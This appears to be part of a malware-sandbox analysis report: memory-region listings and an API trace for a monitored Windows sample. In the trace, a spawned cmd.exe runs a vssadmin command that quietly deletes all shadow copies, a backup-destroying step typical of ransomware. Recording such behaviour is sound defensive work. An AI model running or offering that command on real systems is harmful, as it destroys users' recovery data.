	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 4109
	        start_va = 0x20fe8c60000
	          end_va = 0x20fe8c60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8c60000"
	        filename = ""

Region:
	              id = 4110
	        start_va = 0x20fe8c70000
	          end_va = 0x20fe8c7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8c70000"
	        filename = ""

Region:
	              id = 4111
	        start_va = 0x20fe8c80000
	          end_va = 0x20fe8d3bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8c80000"
	        filename = ""

Region:
	              id = 4112
	        start_va = 0x20fe8c60000
	          end_va = 0x20fe8c63fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8c60000"
	        filename = ""

Region:
	              id = 4113
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 4119
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 4120
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 4123
	        start_va = 0x20fe8d40000
	          end_va = 0x20fe8d46fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8d40000"
	        filename = ""

Region:
	              id = 4124
	        start_va = 0x20fe8d50000
	          end_va = 0x20fe8d50fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8d50000"
	        filename = ""

Region:
	              id = 4125
	        start_va = 0x20fe8d60000
	          end_va = 0x20fe8d60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8d60000"
	        filename = ""

Region:
	              id = 4126
	        start_va = 0x20fe8d70000
	          end_va = 0x20fe8d74fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 4128
	        start_va = 0x20feb0a0000
	          end_va = 0x20feb0a0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 4130
	        start_va = 0x20feb0b0000
	          end_va = 0x20feb0b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020feb0b0000"
	        filename = ""

Region:
	              id = 4131
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 4132
	        start_va = 0x20feb0c0000
	          end_va = 0x20feb0c0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 4133
	        start_va = 0x20feb0d0000
	          end_va = 0x20feb0d1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020feb0d0000"
	        filename = ""


Thread:
	id = 312
	os_tid = 0x12a0


Thread:
	id = 313
	os_tid = 0xcf8


Thread:
	id = 317
	os_tid = 0xcec


Thread:
	id = 318
	os_tid = 0x1190


Process:
	id = "55"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2d464000"
	os_pid = "0xccc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=K: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4134
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4135
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4136
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4137
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4138
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 4139
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 4140
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4141
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 4142
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4143
	        start_va = 0x7ebd0000
	          end_va = 0x7ebf2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ebd0000"
	        filename = ""

Region:
	              id = 4144
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4145
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4146
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4147
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4148
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4149
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 4150
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 4151
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 4152
	        start_va = 0x4600000
	          end_va = 0x47effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4156
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4157
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4158
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4271
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4272
	        start_va = 0x4600000
	          end_va = 0x47dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 4273
	        start_va = 0x47e0000
	          end_va = 0x47effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047e0000"
	        filename = ""

Region:
	              id = 4276
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4277
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4280
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4281
	        start_va = 0x7ead0000
	          end_va = 0x7ebcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ead0000"
	        filename = ""

Region:
	              id = 4568
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4569
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4577
	        start_va = 0x280000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 4578
	        start_va = 0x47f0000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047f0000"
	        filename = ""

Region:
	              id = 4579
	        start_va = 0x48f0000
	          end_va = 0x49dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048f0000"
	        filename = ""

Region:
	              id = 4580
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4644
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 4665
	        start_va = 0x49e0000
	          end_va = 0x4d16fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 320
	os_tid = 0xcc4

	[0293.232] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0293.246] GetProcessHeap () returned 0x46e0000
	[0293.247] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x400a) returned 0x46ec400
	[0293.247] GetProcessHeap () returned 0x46e0000
	[0293.248] RtlFreeHeap (HeapHandle=0x46e0000, Flags=0x0, BaseAddress=0x46ec400) returned 1
	[0293.250] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0293.250] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0293.250] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0293.251] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0293.251] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0293.251] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0293.251] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0293.251] GetProcessHeap () returned 0x46e0000
	[0293.251] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x58) returned 0x46e9000
	[0293.251] GetProcessHeap () returned 0x46e0000
	[0293.251] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x1a) returned 0x46e0578
	[0293.253] GetProcessHeap () returned 0x46e0000
	[0293.253] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x52) returned 0x46e9060
	[0293.255] GetConsoleTitleW (in: lpConsoleTitle=0x18f958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0293.498] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0293.498] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0293.498] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0293.498] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0293.499] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0293.500] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0293.501] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0293.502] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0293.503] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0293.504] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0293.505] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0293.506] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0293.506] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0293.506] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0293.507] GetProcessHeap () returned 0x46e0000
	[0293.507] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x210) returned 0x46e90c0
	[0293.508] GetProcessHeap () returned 0x46e0000
	[0293.508] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x64) returned 0x46e92d8
	[0293.508] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0293.509] GetProcessHeap () returned 0x46e0000
	[0293.509] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x418) returned 0x46e05c8
	[0293.509] SetErrorMode (uMode=0x0) returned 0x0
	[0293.509] SetErrorMode (uMode=0x1) returned 0x0
	[0293.510] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46e05d0, lpFilePart=0x18f464 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f464*="Desktop") returned 0x1d
	[0293.510] SetErrorMode (uMode=0x0) returned 0x1
	[0293.510] GetProcessHeap () returned 0x46e0000
	[0293.510] RtlReAllocateHeap (Heap=0x46e0000, Flags=0x0, Ptr=0x46e05c8, Size=0x56) returned 0x46e05c8
	[0293.510] GetProcessHeap () returned 0x46e0000
	[0293.510] RtlSizeHeap (HeapHandle=0x46e0000, Flags=0x0, MemoryPointer=0x46e05c8) returned 0x56
	[0293.510] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0293.511] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0293.511] GetProcessHeap () returned 0x46e0000
	[0293.511] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x182) returned 0x46e9348
	[0293.511] GetProcessHeap () returned 0x46e0000
	[0293.511] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0x2fc) returned 0x46e0628
	[0293.829] GetProcessHeap () returned 0x46e0000
	[0293.829] RtlReAllocateHeap (Heap=0x46e0000, Flags=0x0, Ptr=0x46e0628, Size=0x184) returned 0x46e0628
	[0293.830] GetProcessHeap () returned 0x46e0000
	[0293.830] RtlSizeHeap (HeapHandle=0x46e0000, Flags=0x0, MemoryPointer=0x46e0628) returned 0x184
	[0293.830] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0293.830] GetProcessHeap () returned 0x46e0000
	[0293.831] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x8, Size=0xe0) returned 0x46e94d8
	[0293.841] GetProcessHeap () returned 0x46e0000
	[0293.841] RtlReAllocateHeap (Heap=0x46e0000, Flags=0x0, Ptr=0x46e94d8, Size=0x76) returned 0x46e94d8
	[0293.841] GetProcessHeap () returned 0x46e0000
	[0293.841] RtlSizeHeap (HeapHandle=0x46e0000, Flags=0x0, MemoryPointer=0x46e94d8) returned 0x76
	[0293.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0293.843] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1f0) returned 0xffffffff
	[0293.845] GetLastError () returned 0x2
	[0293.845] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0293.845] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1f0) returned 0xffffffff
	[0293.847] GetLastError () returned 0x2
	[0293.847] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0293.847] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1f0) returned 0x46e9558
	[0293.848] GetProcessHeap () returned 0x46e0000
	[0293.848] RtlAllocateHeap (HeapHandle=0x46e0000, Flags=0x0, Size=0x14) returned 0x46e7718
	[0293.848] FindClose (in: hFindFile=0x46e9558 | out: hFindFile=0x46e9558) returned 1
	[0293.848] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1f0) returned 0xffffffff
	[0293.848] GetLastError () returned 0x2
	[0293.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f1f0) returned 0x46e9558
	[0293.849] GetProcessHeap () returned 0x46e0000
	[0293.849] RtlReAllocateHeap (Heap=0x46e0000, Flags=0x0, Ptr=0x46e7718, Size=0x4) returned 0x46e9598
	[0293.850] FindClose (in: hFindFile=0x46e9558 | out: hFindFile=0x46e9558) returned 1
	[0293.850] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0293.850] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0293.850] GetConsoleTitleW (in: lpConsoleTitle=0x18f6e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0294.077] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f610, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f5f4 | out: lpAttributeList=0x18f610, lpSize=0x18f5f4) returned 1
	[0294.077] UpdateProcThreadAttribute (in: lpAttributeList=0x18f610, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f5fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f610, lpPreviousValue=0x0) returned 1
	[0294.077] GetStartupInfoW (in: lpStartupInfo=0x18f648 | out: lpStartupInfo=0x18f648*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0294.077] GetProcessHeap () returned 0x46e0000
